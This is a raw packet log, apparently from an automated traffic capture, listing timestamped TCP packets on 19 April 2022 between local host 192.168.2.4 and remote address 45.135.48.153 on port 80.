Apr 19, 2022 16:44:41.019205093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.019278049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.019398928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.019450903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.019527912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.019649982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.019704103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.019772053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.019840956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.019889116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.019969940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.020062923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.020114899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.020201921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.020283937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.020363092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.020414114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.020519018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.020571947 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.020648003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.020771980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.020848036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.020853996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.020982027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.021050930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.021130085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.021250010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.021302938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.021330118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.021521091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.021538019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.021589041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.021688938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.021747112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.021771908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.021889925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.021939993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.022012949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.022099972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.022157907 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.022229910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.022372007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.022427082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.022494078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.022572041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.022629976 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.022680998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.022813082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.022864103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.022903919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.023051977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.023108959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.023161888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.023252010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.023302078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.023444891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.023489952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.023550987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.023592949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.023690939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.023742914 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.023812056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.023874998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.023938894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.532337904 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.829302073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.829365969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.829417944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.829461098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.829500914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.829572916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.829611063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.829657078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.829701900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.829720974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.829828978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.829901934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.829941034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.830077887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.830147028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.830300093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.830379963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.830424070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.830445051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.830465078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.830518007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.830652952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.830693960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.830756903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.830836058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.830969095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.831012011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.831027031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.831150055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.831203938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.831276894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.831377029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.831432104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.831478119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.831583023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.831644058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.831733942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.831864119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.831903934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.831917048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.832029104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.832079887 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.832155943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.832277060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.832333088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.832436085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.832479000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.832539082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.832601070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.832705975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.832762957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.832825899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.832983017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.833028078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.833034992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.833214998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.833268881 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.833317041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.833530903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.833571911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.833590984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.833766937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.833817959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.833857059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.833890915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.833919048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.833950043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.834111929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.834172010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.834214926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.834336042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.834398031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.834428072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.834562063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.834604025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.834619999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.834718943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.834773064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.834918976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.834988117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.835055113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.835117102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.835186005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.835241079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.835334063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.835485935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.835545063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.835597992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.835669041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.835722923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.835783958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.835855007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.835906982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.836004972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.836097956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.836149931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.836210966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.836359978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.836416960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.836472988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.836611986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.836671114 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.836719990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.836837053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.836879015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.836890936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.837013960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.837090969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.837155104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.837286949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.837330103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.837343931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.837496996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.837553978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.837594032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.837699890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.837780952 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.837846041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.837917089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.837999105 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.838063002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.838131905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.838186026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.838279963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.838404894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.838463068 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.838469982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.838593006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.838646889 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.838711977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.838844061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.838901043 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.838954926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.839060068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.839157104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.839175940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.839255095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.839313030 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.839394093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.839483023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.839543104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.839667082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.839760065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.839862108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.839905024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.839975119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.840054035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.840075970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.840235949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.840292931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.840445995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.840487957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.840550900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.840601921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.840642929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.840704918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.840773106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.840866089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.840929031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.840992928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.841120005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.841177940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.841239929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.841310024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.841367006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.841423035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.841558933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.841628075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.841655016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.841805935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.841865063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.841900110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.841983080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.842040062 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.842091084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.842192888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.842250109 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.842333078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.842422962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.842478991 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.842546940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.842647076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.842698097 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.842765093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.842876911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.842936039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.842983961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.843100071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.843156099 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.843204975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.843338013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.843396902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.843466043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.843599081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.843652964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.843700886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.843817949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.843875885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.843908072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.844058037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.844119072 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.844168901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.844257116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.844315052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.844355106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.844461918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.844523907 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.844623089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.844702005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.844757080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.844822884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.844942093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.845004082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.845052004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.845144987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.845199108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.845300913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.845372915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.845432997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.845484018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.845592976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.845648050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.845695019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.845859051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.845921040 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.845938921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.846040964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.846098900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.846178055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.846299887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.846350908 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.846399069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.846524000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.846586943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.846625090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.846744061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.846796036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.846843958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.846977949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.847038984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.847089052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.847178936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.847234964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.847390890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.847418070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.847507954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.847656012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.847902060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.847965002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.848148108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.848340034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.848411083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.848623991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.848742008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.848798037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.848818064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.848995924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.849059105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.849064112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.849281073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.849334955 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.849548101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.849659920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.849714041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.849764109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.849900961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.849961042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.849977970 CEST	80	49758	45.135.48.153	192.168.2.4
